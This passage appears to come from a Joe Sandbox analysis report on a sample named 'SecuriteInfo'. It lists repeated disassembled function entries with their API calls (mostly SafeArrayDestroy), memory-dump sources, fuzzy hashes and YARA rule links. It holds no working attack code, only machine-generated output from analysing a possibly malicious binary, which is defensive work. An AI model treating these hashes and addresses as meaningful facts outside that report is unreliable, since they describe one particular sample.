                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: c434d91f3d4e7840c933eb38969606d7cc0d3969ffc3930d269bd607cd8a6c6c
                                                                                          • Instruction ID: 03990291120511dc0cf311122c1bc8d026c69661301cbdec61a933724f1d750a
                                                                                          • Opcode Fuzzy Hash: c434d91f3d4e7840c933eb38969606d7cc0d3969ffc3930d269bd607cd8a6c6c
                                                                                          • Instruction Fuzzy Hash: FE313A70E016189FEF10CBA8CC80F6EB7FAAF89210F60858AE519E7241CB75E941CF50
                                                                                          Function 6D028B64 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: 1cb1f102f48220a16bdc6edbb77d068e653ccfb27e49781370ecee96d535e82f
                                                                                          • Instruction ID: cec7c4bbfcfaf2111044b400fc45fa9f19741e77adf0dbbe2749d9f3b39b9e48
                                                                                          • Opcode Fuzzy Hash: 1cb1f102f48220a16bdc6edbb77d068e653ccfb27e49781370ecee96d535e82f
                                                                                          • Instruction Fuzzy Hash: 0E311870E016189FEF10DBA8CC80F6EB7FAAF99210F64858AE519E7251CB75E941CF50
                                                                                          Function 6D020561 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: c872b739c7545842e3ba02720de5cc711a6f4034af29720dbd2e0d314ec4bd8c
                                                                                          • Instruction ID: 0eddcd50539b92e075717a557ca175425ae58589336228ab802df62047aeb616
                                                                                          • Opcode Fuzzy Hash: c872b739c7545842e3ba02720de5cc711a6f4034af29720dbd2e0d314ec4bd8c
                                                                                          • Instruction Fuzzy Hash: D4314E70E116189FEB10DFA9CD80BADB7F9AF89300F60858AE559EB251C771DE818F50
                                                                                          Function 6D0201BE Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: bfb2e4d0ef1a20a5cb77fde5e692ffefe4f074a44e651d4a3ec70972d1123772
                                                                                          • Instruction ID: e14b80b37b6c38f48be90f07199863506dd1c9fa63dd0073bd6f540826b3ca40
                                                                                          • Opcode Fuzzy Hash: bfb2e4d0ef1a20a5cb77fde5e692ffefe4f074a44e651d4a3ec70972d1123772
                                                                                          • Instruction Fuzzy Hash: E7315C70E116189FEB10DFA9CC80BADB7FAAF89200F60859AE558EB241C771DD818F50
                                                                                          Function 6D0200B4 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: 1cb1f102f48220a16bdc6edbb77d068e653ccfb27e49781370ecee96d535e82f
                                                                                          • Instruction ID: ecccb150747c20527476bed96d0f3d60a7616f66523424e36f402bf12883116c
                                                                                          • Opcode Fuzzy Hash: 1cb1f102f48220a16bdc6edbb77d068e653ccfb27e49781370ecee96d535e82f
                                                                                          • Instruction Fuzzy Hash: 11313C70E116189FEB10DFA9CC80BADB7F9AF89300F60858AE558EB251CB71DD818F50
                                                                                          Function 6D0203DE Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: f40f4406ed0ed4d5cce1a18cd63a963c216b881fcc09837aae5c228ed9300d86
                                                                                          • Instruction ID: ee85131b01ab45143f5fa5f12eb4cfa1a10cebda9b6e9d513662dfe465084440
                                                                                          • Opcode Fuzzy Hash: f40f4406ed0ed4d5cce1a18cd63a963c216b881fcc09837aae5c228ed9300d86
                                                                                          • Instruction Fuzzy Hash: 55315E70E156189FDB10CFA9CC80BADB7F9AF89200F60868AE558EB251C771DA80CF50
                                                                                          Function 6D0202C2 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: e008c0142c0749583fcda3152edbf45bbfa93f44252878fbdecb638b8494725d
                                                                                          • Instruction ID: c7bbc1487c6f4c04e48125abec48f9acb959925614e23a9c008d77031a92c306
                                                                                          • Opcode Fuzzy Hash: e008c0142c0749583fcda3152edbf45bbfa93f44252878fbdecb638b8494725d
                                                                                          • Instruction Fuzzy Hash: 5B314B70E116189FDB10CFA9CC80BADB7F9AF89200F60868AE559EB241C771DA818F50
                                                                                          Function 6D01FD9F Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: c434d91f3d4e7840c933eb38969606d7cc0d3969ffc3930d269bd607cd8a6c6c
                                                                                          • Instruction ID: b16de8c5dc53415030016efd100fbb2749cdd5ea94c7d32f886242fae23b5c49
                                                                                          • Opcode Fuzzy Hash: c434d91f3d4e7840c933eb38969606d7cc0d3969ffc3930d269bd607cd8a6c6c
                                                                                          • Instruction Fuzzy Hash: 47313E70E156189FDB10CFA9CD80BADB7FAAF89200F60858AE559EB241C771E9418F50
                                                                                          Function 6D029011 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: c872b739c7545842e3ba02720de5cc711a6f4034af29720dbd2e0d314ec4bd8c
                                                                                          • Instruction ID: 676e3fd40f709e5a227d2aebe6314c64389783aa7ab504f196f033fe6c91c7de
                                                                                          • Opcode Fuzzy Hash: c872b739c7545842e3ba02720de5cc711a6f4034af29720dbd2e0d314ec4bd8c
                                                                                          • Instruction Fuzzy Hash: FA312B70E016189FDB10DBA8CC80F6EB7F9AF89210F60858AE519E7245CB75D941CF50
                                                                                          Function 6D07249C Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000100,?,?,?,?,?,6D0725B1,?,00000000,?), ref: 6D0724E6
                                                                                          • _malloc.LIBCMT ref: 6D07251B
                                                                                          • _memset.LIBCMT ref: 6D07253B
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000,00000001,00000000), ref: 6D072550
                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6D07255E
                                                                                          • __freea.LIBCMT ref: 6D072568
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$StringType__freea_malloc_memset
                                                                                          • String ID:
                                                                                          • API String ID: 525495869-0
                                                                                          • Opcode ID: b1390a93754809e1f4f5f20129681e67ceeb9eee405742692837bca1676282d8
                                                                                          • Instruction ID: f1c9e9fdd114b2b72a0f6113c51155ddaa7c2edfe0b7ac2ee486b955a57421c3
                                                                                          • Opcode Fuzzy Hash: b1390a93754809e1f4f5f20129681e67ceeb9eee405742692837bca1676282d8
                                                                                          • Instruction Fuzzy Hash: 3A3159B160024AAFFF21DF68DC90EAF7BE9EB09358F114425FA159B250E730D9608B64
                                                                                          Function 6D028A39 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D026A08
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D026A15
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D026A41
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Destroy$Bound$Element
                                                                                          • String ID:
                                                                                          • API String ID: 757764206-0
                                                                                          • Opcode ID: 1e6f7b7dce5f7784475edf30d577815a120db3ad4df287efa4e6ff796eb938dd
                                                                                          • Instruction ID: 1916a1cdc9561ae0e781cd3ff48d11f9185756488d9243e86b5bba5fe1b860ef
                                                                                          • Opcode Fuzzy Hash: 1e6f7b7dce5f7784475edf30d577815a120db3ad4df287efa4e6ff796eb938dd
                                                                                          • Instruction Fuzzy Hash: EA312C70E016189FDF10DB68CC80FAEB7FAAF89210F60468AE519E7241CB75D9818F50
                                                                                          Function 6D0287EE Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D026A08
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D026A15
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D026A41
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
